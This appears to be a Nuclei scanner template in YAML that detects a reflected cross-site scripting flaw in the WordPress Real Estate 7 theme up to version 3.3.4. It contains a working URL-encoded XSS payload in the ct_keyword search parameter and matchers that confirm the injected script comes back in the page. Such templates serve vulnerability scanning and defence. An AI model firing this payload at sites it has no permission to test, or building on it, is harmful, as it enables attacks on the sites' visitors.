31 lines
1.5 KiB
YAML
31 lines
1.5 KiB
YAML
|
id: wp-real-estate-xss
|
||
|
|
info:
|
||
|
|
name: WordPress Real Estate 7 Theme <= 3.3.4 - Unauthenticated Reflected Cross-Site Scripting (XSS)
|
||
|
|
author: Harsh
|
||
|
|
severity: medium
|
||
|
|
description: |
|
||
|
|
The Real Estate 7 premium theme for WordPress is vulnerable to Reflected Cross-Site Scripting (XSS) attack vector in versions up to, and including, v3.3.4 via the 'ct_additional_features' option due to insufficient input sanitization and output escaping. This vulnerability allows unauthenticated attackers to inject malicious JavaScript payload in the search page that execute if they can trick a user into performing an action such as clicking on a link.
|
||
|
|
reference:
|
||
|
|
- https://www.exploitalert.com/view-details.html?id=39344
|
||
|
|
- https://packetstormsecurity.com/files/171186/WordPress-Real-Estate-7-Theme-3.3.4-Cross-Site-Scripting.html
|
||
|
|
classification:
|
||
|
|
cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N
|
||
|
|
cvss-score: 6.1
|
||
|
|
cwe-id: CWE-79
|
||
|
|
metadata:
|
||
|
|
tags: wordpress,unauthenticated,xss
|
||
|
|
|
||
|
|
http:
|
||
|
|
- raw:
|
||
|
|
- |
|
||
|
|
GET /?ct_keyword=%22%3E%3Cimg%20src%3Dx%20onerror%3Dprompt%28document.domain%29%3E&ct_city=0&ct_state=0&ct_zipcode=0&search-listings=true&ct_property_type=0&ct_beds=0&ct_baths=0&ct_price_from&ct_price_to HTTP/2
|
||
|
|
Host: {{Hostname}}
|
||
|
|
|
||
|
|
matchers:
|
||
|
|
- type: dsl
|
||
|
|
dsl:
|
||
|
|
- 'status_code == 200'
|
||
|
|
- 'contains(body, "onerror=prompt(document.domain)>")'
|
||
|
|
- 'contains(all_headers, "text/html")'
|
||
|
|
condition: and
|